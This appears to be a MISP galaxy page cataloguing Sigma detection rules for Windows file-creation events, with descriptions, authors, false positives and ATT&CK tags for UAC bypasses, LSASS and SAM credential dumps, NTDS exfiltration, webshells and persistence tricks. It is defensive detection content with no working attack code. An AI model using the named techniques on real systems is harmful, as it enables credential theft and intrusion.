author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2020/05/02
falsepositive ['FP could be caused by legitimate application writing shortcuts for example. This folder should always be inspected to make sure that all the files in there are legitimate']
filename file_event_win_startup_folder_file_write.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.persistence', 'attack.t1547.001']
Related clusters

To see the related clusters, click here.

UAC Bypass Using NTFS Reparse Point - File

Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)

Internal MISP references

UUID 7fff6773-2baa-46de-a24a-b6eec1aba2d1 which can be used as unique global reference for UAC Bypass Using NTFS Reparse Point - File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021/08/30
falsepositive ['Unknown']
filename file_event_win_uac_bypass_ntfs_reparse_point.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.

NTDS Exfiltration Filename Patterns

Detects creation of files with specific name patterns seen used in various tools that export the NTDS.DIT for exfiltration.

Internal MISP references

UUID 3a8da4e0-36c1-40d2-8b29-b3e890d5172a which can be used as unique global reference for NTDS Exfiltration Filename Patterns in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/03/11
falsepositive ['Unknown']
filename file_event_win_ntds_exfil_tools.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.003']
Related clusters

To see the related clusters, click here.

Suspicious Interactive PowerShell as SYSTEM

Detects the creation of files that indicator an interactive use of PowerShell in the SYSTEM user context

Internal MISP references

UUID 5b40a734-99b6-4b98-a1d0-1cea51a08ab2 which can be used as unique global reference for Suspicious Interactive PowerShell as SYSTEM in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/12/07
falsepositive ['Administrative activity', 'PowerShell scripts running as SYSTEM user']
filename file_event_win_susp_system_interactive_powershell.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

UAC Bypass Using IDiagnostic Profile - File

Detects the creation of a file by "dllhost.exe" in System32 directory part of "IDiagnosticProfileUAC" UAC bypass technique

Internal MISP references

UUID 48ea844d-19b1-4642-944e-fe39c2cc1fec which can be used as unique global reference for UAC Bypass Using IDiagnostic Profile - File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/03
falsepositive ['Unknown']
filename file_event_win_uac_bypass_idiagnostic_profile.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.execution', 'attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.

Legitimate Application Dropped Archive

Detects programs on a Windows system that should not write an archive to disk

Internal MISP references

UUID 654fcc6d-840d-4844-9b07-2c3300e54a26 which can be used as unique global reference for Legitimate Application Dropped Archive in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Florian Roth
creation_date 2022/08/21
falsepositive ['Unknown']
filename file_event_win_susp_legitimate_app_dropping_archive.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Suspicious Desktopimgdownldr Target File

Detects a suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension

Internal MISP references

UUID fc4f4817-0c53-4683-a4ee-b17a64bc1039 which can be used as unique global reference for Suspicious Desktopimgdownldr Target File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2020/07/03
falsepositive ['False positives depend on scripts and administrative tools used in the monitored environment']
filename file_event_win_susp_desktopimgdownldr_file.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.command_and_control', 'attack.t1105']
Related clusters

To see the related clusters, click here.

Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)

Internal MISP references

UUID 62ed5b55-f991-406a-85d9-e8e8fdf18789 which can be used as unique global reference for UAC Bypass Using Consent and Comctl32 - File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021/08/23
falsepositive ['Unknown']
filename file_event_win_uac_bypass_consent_comctl32.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.

Potential Suspicious PowerShell Module File Created

Detects the creation of a new PowerShell module in the first folder of the module directory structure "\WindowsPowerShell\Modules\malware\malware.psm1". This is somewhat an uncommon practice as legitimate modules often includes a version folder.

Internal MISP references

UUID e8a52bbd-bced-459f-bd93-64db45ce7657 which can be used as unique global reference for Potential Suspicious PowerShell Module File Created in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/09
falsepositive ['False positive rate will vary depending on the environments. Additional filters might be required to make this logic usable in production.']
filename file_event_win_powershell_module_susp_creation.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.persistence']

Potential SAM Database Dump

Detects the creation of files that look like exports of the local SAM (Security Account Manager)

Internal MISP references

UUID 4e87b8e2-2ee9-4b2a-a715-4727d297ece0 which can be used as unique global reference for Potential SAM Database Dump in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/02/11
falsepositive ['Rare cases of administrative activity']
filename file_event_win_sam_dump.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.002']
Related clusters

To see the related clusters, click here.

PowerShell Script Dropped Via PowerShell.EXE

Detects PowerShell creating a PowerShell file (.ps1). While often times this behavior is benign, sometimes it can be a sign of a dropper script trying to achieve persistence.

Internal MISP references

UUID 576426ad-0131-4001-ae01-be175da0c108 which can be used as unique global reference for PowerShell Script Dropped Via PowerShell.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2023/05/09
falsepositive ['False positives will differ depending on the environment and scripts used. Apply additional filters accordingly.']
filename file_event_win_powershell_drop_powershell.yml
level low
logsource.category file_event
logsource.product windows
tags ['attack.persistence']

UAC Bypass Using MSConfig Token Modification - File

Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)

Internal MISP references

UUID 41bb431f-56d8-4691-bb56-ed34e390906f which can be used as unique global reference for UAC Bypass Using MSConfig Token Modification - File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021/08/30
falsepositive ['Unknown']
filename file_event_win_uac_bypass_msconfig_gui.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.

Rclone Config File Creation

Detects Rclone config files being created

Internal MISP references

UUID 34986307-b7f4-49be-92f3-e7a4d01ac5db which can be used as unique global reference for Rclone Config File Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Aaron Greetham (@beardofbinary) - NCC Group
creation_date 2021/05/26
falsepositive ['Legitimate Rclone usage']
filename file_event_win_rclone_config_files.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.exfiltration', 'attack.t1567.002']
Related clusters

To see the related clusters, click here.

Suspicious Unattend.xml File Access

Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored. If these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended windows install process

Internal MISP references

UUID 1a3d42dd-3763-46b9-8025-b5f17f340dfb which can be used as unique global reference for Suspicious Unattend.xml File Access in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/19
falsepositive ['Unknown']
filename file_event_win_access_susp_unattend_xml.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.credential_access', 'attack.t1552.001']
Related clusters

To see the related clusters, click here.

EVTX Created In Uncommon Location

Detects the creation of new files with the ".evtx" extension in non-common or non-standard location. This could indicate tampering with default EVTX locations in order to evade security controls or simply exfiltration of event log to search for sensitive information within. Note that backup software and legitimate administrator might perform similar actions during troubleshooting.

Internal MISP references

UUID 65236ec7-ace0-4f0c-82fd-737b04fd4dcb which can be used as unique global reference for EVTX Created In Uncommon Location in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author D3F7A5105
creation_date 2023/01/02
falsepositive ['Administrator or backup activity', 'An unknown bug seems to trigger the Windows "svchost" process to drop EVTX files in the "C:\Windows\Temp" directory in the form "_.evtx". See https://superuser.com/questions/1371229/low-disk-space-after-filling-up-c-windows-temp-with-evtx-and-txt-files']
filename file_event_win_create_evtx_non_common_locations.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.002']
Related clusters

To see the related clusters, click here.

LiveKD Driver Creation

Detects the creation of the LiveKD driver, which is used for live kernel debugging

Internal MISP references

UUID 16fe46bb-4f64-46aa-817d-ff7bec4a2352 which can be used as unique global reference for LiveKD Driver Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/16
falsepositive ['Legitimate usage of LiveKD for debugging purposes will also trigger this']
filename file_event_win_sysinternals_livekd_driver.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation']

UAC Bypass Abusing Winsat Path Parsing - File

Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)

Internal MISP references

UUID 155dbf56-e0a4-4dd0-8905-8a98705045e8 which can be used as unique global reference for UAC Bypass Abusing Winsat Path Parsing - File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021/08/30
falsepositive ['Unknown']
filename file_event_win_uac_bypass_winsat.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.

Publisher Attachment File Dropped In Suspicious Location

Detects creation of files with the ".pub" extension in suspicious or uncommon locations. This could be a sign of attackers abusing Publisher documents

Internal MISP references

UUID 3d2a2d59-929c-4b78-8c1a-145dfe9e07b1 which can be used as unique global reference for Publisher Attachment File Dropped In Suspicious Location in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/02/08
falsepositive ['Legitimate usage of ".pub" files from those locations']
filename file_event_win_office_publisher_files_in_susp_locations.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.defense_evasion']

UAC Bypass Using IEInstal - File

Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)

Internal MISP references

UUID bdd8157d-8e85-4397-bb82-f06cc9c71dbb which can be used as unique global reference for UAC Bypass Using IEInstal - File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021/08/30
falsepositive ['Unknown']
filename file_event_win_uac_bypass_ieinstal.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.

Assembly DLL Creation Via AspNetCompiler

Detects the creation of new DLL assembly files by "aspnet_compiler.exe", which could be a sign of "aspnet_compiler" abuse to proxy execution through a build provider.

Internal MISP references

UUID 4c7f49ee-2638-43bb-b85b-ce676c30b260 which can be used as unique global reference for Assembly DLL Creation Via AspNetCompiler in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/08/14
falsepositive ['Legitimate assembly compilation using a build provider']
filename file_event_win_aspnet_temp_files.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.execution']

PsExec Service File Creation

Detects default PsExec service filename which indicates PsExec service installation and execution

Internal MISP references

UUID 259e5a6a-b8d2-4c38-86e2-26c5e651361d which can be used as unique global reference for PsExec Service File Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Thomas Patzke
creation_date 2017/06/12
falsepositive ['Unknown']
filename file_event_win_sysinternals_psexec_service.yml
level low
logsource.category file_event
logsource.product windows
tags ['attack.execution', 'attack.t1569.002', 'attack.s0029']
Related clusters

To see the related clusters, click here.

Potential Initial Access via DLL Search Order Hijacking

Detects attempts to create a DLL file to a known desktop application dependencies folder such as Slack, Teams or OneDrive and by an unusual process. This may indicate an attempt to load a malicious module via DLL search order hijacking.

Internal MISP references

UUID dbbd9f66-2ed3-4ca2-98a4-6ea985dd1a1c which can be used as unique global reference for Potential Initial Access via DLL Search Order Hijacking in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Rauch (rule), Elastic (idea)
creation_date 2022/10/21
falsepositive ['Unknown']
filename file_event_win_initial_access_dll_search_order_hijacking.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.t1566', 'attack.t1566.001', 'attack.initial_access', 'attack.t1574', 'attack.t1574.001', 'attack.defense_evasion']
Related clusters

To see the related clusters, click here.

Suspicious Creation with Colorcpl

Once executed, colorcpl.exe will copy the arbitrary file to c:\windows\system32\spool\drivers\color\

Internal MISP references

UUID e15b518d-b4ce-4410-a9cd-501f23ce4a18 which can be used as unique global reference for Suspicious Creation with Colorcpl in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/21
falsepositive ['Unknown']
filename file_event_win_susp_colorcpl.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1564']
Related clusters

To see the related clusters, click here.

File With Uncommon Extension Created By An Office Application

Detects the creation of files with an executable or script extension by an Office application.

Internal MISP references

UUID c7a74c80-ba5a-486e-9974-ab9e682bc5e4 which can be used as unique global reference for File With Uncommon Extension Created By An Office Application in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems)
creation_date 2021/08/23
falsepositive ['Unknown']
filename file_event_win_office_susp_file_extension.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.t1204.002', 'attack.execution']
Related clusters

To see the related clusters, click here.

Hijack Legit RDP Session to Move Laterally

Detects the usage of tsclient share to place a backdoor on the RDP source machine's startup folder

Internal MISP references

UUID 52753ea4-b3a0-4365-910d-36cff487b789 which can be used as unique global reference for Hijack Legit RDP Session to Move Laterally in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Samir Bousseaden
creation_date 2019/02/21
falsepositive ['Unlikely']
filename file_event_win_tsclient_filewrite_startup.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.command_and_control', 'attack.t1219']
Related clusters

To see the related clusters, click here.

Suspicious File Creation Activity From Fake Recycle.Bin Folder

Detects file write event from/to a fake recycle bin folder that is often used as a staging directory for malware

Internal MISP references

UUID cd8b36ac-8e4a-4c2f-a402-a29b8fbd5bca which can be used as unique global reference for Suspicious File Creation Activity From Fake Recycle.Bin Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems)
creation_date 2023/07/12
falsepositive ['Unknown']
filename file_event_win_susp_recycle_bin_fake_exec.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.persistence', 'attack.defense_evasion']

LSASS Process Memory Dump Creation Via Taskmgr.EXE

Detects the creation of an "lsass.dmp" file by the taskmgr process. This indicates a manual dumping of the LSASS.exe process memory using Windows Task Manager.

Internal MISP references

UUID 69ca12af-119d-44ed-b50f-a47af0ebc364 which can be used as unique global reference for LSASS Process Memory Dump Creation Via Taskmgr.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Swachchhanda Shrawan Poudel
creation_date 2023/10/19
falsepositive ['Rare case of troubleshooting by an administrator or support that has to be investigated regardless']
filename file_event_win_taskmgr_lsass_dump.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

NTDS.DIT Created

Detects creation of a file named "ntds.dit" (Active Directory Database)

Internal MISP references

UUID 0b8baa3f-575c-46ee-8715-d6f28cc7d33c which can be used as unique global reference for NTDS.DIT Created in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/05
falsepositive ['Unknown']
filename file_event_win_ntds_dit_creation.yml
level low
logsource.category file_event
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.003']
Related clusters

To see the related clusters, click here.

Potential Persistence Via Notepad++ Plugins

Detects creation of new ".dll" files inside the plugins directory of a notepad++ installation by a process other than "gup.exe". Which could indicates possible persistence

Internal MISP references

UUID 54127bd4-f541-4ac3-afdb-ea073f63f692 which can be used as unique global reference for Potential Persistence Via Notepad++ Plugins in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/06/10
falsepositive ['Possible FPs during first installation of Notepad++', 'Legitimate use of custom plugins by users in order to enhance notepad++ functionalities']
filename file_event_win_notepad_plus_plus_persistence.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.persistence']

SafetyKatz Default Dump Filename

Detects default lsass dump filename from SafetyKatz

Internal MISP references

UUID e074832a-eada-4fd7-94a1-10642b130e16 which can be used as unique global reference for SafetyKatz Default Dump Filename in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Markus Neis
creation_date 2018/07/24
falsepositive ['Rare legitimate files with similar filename structure']
filename file_event_win_hktl_safetykatz.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

Windows Binaries Write Suspicious Extensions

Detects Windows executables that write files with suspicious extensions

Internal MISP references

UUID b8fd0e93-ff58-4cbd-8f48-1c114e342e62 which can be used as unique global reference for Windows Binaries Write Suspicious Extensions in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/12
falsepositive ['Unknown']
filename file_event_win_shell_write_susp_files_extensions.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036']
Related clusters

To see the related clusters, click here.

ISO or Image Mount Indicator in Recent Files

Detects the creation of recent element file that points to an .ISO, .IMG, .VHD or .VHDX file as often used in phishing attacks. This can be a false positive on server systems but on workstations users should rarely mount .iso or .img files.

Internal MISP references

UUID 4358e5a5-7542-4dcb-b9f3-87667371839b which can be used as unique global reference for ISO or Image Mount Indicator in Recent Files in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/02/11
falsepositive ['Cases in which a user mounts an image file for legitimate reasons']
filename file_event_win_iso_file_recent.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.initial_access', 'attack.t1566.001']
Related clusters

To see the related clusters, click here.

ScreenConnect Temporary Installation Artefact

An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)

Internal MISP references

UUID fec96f39-988b-4586-b746-b93d59fd1922 which can be used as unique global reference for ScreenConnect Temporary Installation Artefact in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/02/13
falsepositive ['Legitimate use']
filename file_event_win_remote_access_tools_screenconnect_artefact.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.command_and_control', 'attack.t1219']
Related clusters

To see the related clusters, click here.

Legitimate Application Dropped Executable

Detects programs on a Windows system that should not write executables to disk

Internal MISP references

UUID f0540f7e-2db3-4432-b9e0-3965486744bc which can be used as unique global reference for Legitimate Application Dropped Executable in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Florian Roth (Nextron Systems)
creation_date 2022/08/21
falsepositive ['Unknown']
filename file_event_win_susp_legitimate_app_dropping_exe.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Suspicious Startup Folder Persistence

Detects when a file with a suspicious extension is created in the startup folder

Internal MISP references

UUID 28208707-fe31-437f-9a7f-4b1108b94d2e which can be used as unique global reference for Suspicious Startup Folder Persistence in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/10
falsepositive ['Rare legitimate usage of some of the extensions mentioned in the rule']
filename file_event_win_susp_startup_folder_persistence.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.persistence', 'attack.t1547.001']
Related clusters

To see the related clusters, click here.

Potential Persistence Attempt Via ErrorHandler.Cmd

Detects creation of a file named "ErrorHandler.cmd" in the "C:\WINDOWS\Setup\Scripts\" directory which could be used as a method of persistence The content of C:\WINDOWS\Setup\Scripts\ErrorHandler.cmd is read whenever some tools under C:\WINDOWS\System32\oobe\ (e.g. Setup.exe) fail to run for any reason.

Internal MISP references

UUID 15904280-565c-4b73-9303-3291f964e7f9 which can be used as unique global reference for Potential Persistence Attempt Via ErrorHandler.Cmd in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/09
falsepositive ['Unknown']
filename file_event_win_errorhandler_persistence.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.persistence']

CrackMapExec File Indicators

Detects file creation events with filename patterns used by CrackMapExec.

Internal MISP references

UUID 736ffa74-5f6f-44ca-94ef-1c0df4f51d2a which can be used as unique global reference for CrackMapExec File Indicators in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2024/03/11
falsepositive ['Unknown']
filename file_event_win_hktl_crackmapexec_indicators.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

Renamed VsCode Code Tunnel Execution - File Indicator

Detects the creation of a file with the name "code_tunnel.json" which indicate execution and usage of VsCode tunneling utility by an "Image" or "Process" other than VsCode.

Internal MISP references

UUID d102b8f5-61dc-4e68-bd83-9a3187c67377 which can be used as unique global reference for Renamed VsCode Code Tunnel Execution - File Indicator in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/10/25
falsepositive ['Unknown']
filename file_event_win_vscode_tunnel_renamed_execution.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.command_and_control']

ISO File Created Within Temp Folders

Detects the creation of a ISO file in the Outlook temp folder or in the Appdata temp folder. Typical of Qakbot TTP from end-July 2022.

Internal MISP references

UUID 2f9356ae-bf43-41b8-b858-4496d83b2acb which can be used as unique global reference for ISO File Created Within Temp Folders in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @sam0x90
creation_date 2022/07/30
falsepositive ['Potential FP by sysadmin opening a zip file containing a legitimate ISO file']
filename file_event_win_iso_file_mount.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.initial_access', 'attack.t1566.001']
Related clusters

To see the related clusters, click here.

AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl - File

Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)

Internal MISP references

UUID d353dac0-1b41-46c2-820c-d7d2561fc6ed which can be used as unique global reference for AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl - File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Julia Fomina, oscd.community
creation_date 2020/10/06
falsepositive ['Unlikely']
filename file_event_win_winrm_awl_bypass.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1216']
Related clusters

To see the related clusters, click here.

SCR File Write Event

Detects the creation of screensaver files (.scr) outside of system folders. Attackers may execute an application as an ".SCR" file using "rundll32.exe desk.cpl,InstallScreenSaver" for example.

Internal MISP references

UUID c048f047-7e2a-4888-b302-55f509d4a91d which can be used as unique global reference for SCR File Write Event in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christopher Peacock @securepeacock, SCYTHE @scythe_io
creation_date 2022/04/27
falsepositive ['The installation of new screen savers by third party software']
filename file_event_win_new_scr_file.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.011']
Related clusters

To see the related clusters, click here.

Office Macro File Download

Detects the creation of a new office macro files on the systems via an application (browser, mail client).

Internal MISP references

UUID 0e29e3a7-1ad8-40aa-b691-9f82ecd33d66 which can be used as unique global reference for Office Macro File Download in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/01/23
falsepositive ['Legitimate macro files downloaded from the internet', 'Legitimate macro files sent as attachments via emails']
filename file_event_win_office_macro_files_downloaded.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.initial_access', 'attack.t1566.001']
Related clusters

To see the related clusters, click here.

New Custom Shim Database Created

Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time.

Internal MISP references

UUID ee63c85c-6d51-4d12-ad09-04e25877a947 which can be used as unique global reference for New Custom Shim Database Created in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali (Nextron Systems)
creation_date 2021/12/29
falsepositive ['Legitimate custom SHIM installations will also trigger this rule']
filename file_event_win_creation_new_shim_database.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.persistence', 'attack.t1547.009']
Related clusters

To see the related clusters, click here.

Potential Webshell Creation On Static Website

Detects the creation of files with certain extensions on a static web site. This can be indicative of potential uploads of a web shell.

Internal MISP references

UUID 39f1f9f2-9636-45de-98f6-a4046aa8e4b9 which can be used as unique global reference for Potential Webshell Creation On Static Website in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Beyu Denis, oscd.community, Tim Shelton, Thurein Oo
creation_date 2019/10/22
falsepositive ['Legitimate administrator or developer creating legitimate executable files in a web application folder']
filename file_event_win_webshell_creation_detect.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.persistence', 'attack.t1505.003']
Related clusters

To see the related clusters, click here.

Suspicious Get-Variable.exe Creation

Get-Variable is a valid PowerShell cmdlet WindowsApps is by default in the path where PowerShell is executed. So when the Get-Variable command is issued on PowerShell execution, the system first looks for the Get-Variable executable in the path and executes the malicious binary instead of looking for the PowerShell cmdlet.

Internal MISP references

UUID 0c3fac91-5627-46e8-a6a8-a0d7b9b8ae1b which can be used as unique global reference for Suspicious Get-Variable.exe Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/04/23
falsepositive ['Unknown']
filename file_event_win_susp_get_variable.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.persistence', 'attack.t1546', 'attack.defense_evasion', 'attack.t1027']
Related clusters

To see the related clusters, click here.

WerFault LSASS Process Memory Dump

Detects WerFault creating a dump file with a name that indicates that the dump file could be an LSASS process memory, which contains user credentials

Internal MISP references

UUID c3e76af5-4ce0-4a14-9c9a-25ceb8fda182 which can be used as unique global reference for WerFault LSASS Process Memory Dump in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/06/27
falsepositive ['Unknown']
filename file_event_win_lsass_werfault_dump.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

Office Macro File Creation

Detects the creation of a new office macro files on the systems

Internal MISP references

UUID 91174a41-dc8f-401b-be89-7bfc140612a0 which can be used as unique global reference for Office Macro File Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/01/23
falsepositive ['Very common in environments that rely heavily on macro documents']
filename file_event_win_office_macro_files_created.yml
level low
logsource.category file_event
logsource.product windows
tags ['attack.initial_access', 'attack.t1566.001']
Related clusters

To see the related clusters, click here.

Suspicious File Event With Teams Objects

Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.

Internal MISP references

UUID 6902955a-01b7-432c-b32a-6f5f81d8f624 which can be used as unique global reference for Suspicious File Event With Teams Objects in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @SerkinValery
creation_date 2022/09/16
falsepositive ['Unknown']
filename file_event_win_access_susp_teams.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.credential_access', 'attack.t1528']
Related clusters

To see the related clusters, click here.

Writing Local Admin Share

Aversaries may use to interact with a remote network share using Server Message Block (SMB). This technique is used by post-exploitation frameworks.

Internal MISP references

UUID 4aafb0fa-bff5-4b9d-b99e-8093e659c65f which can be used as unique global reference for Writing Local Admin Share in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/01
falsepositive ['Unknown']
filename file_event_win_writing_local_admin_share.yml
level medium
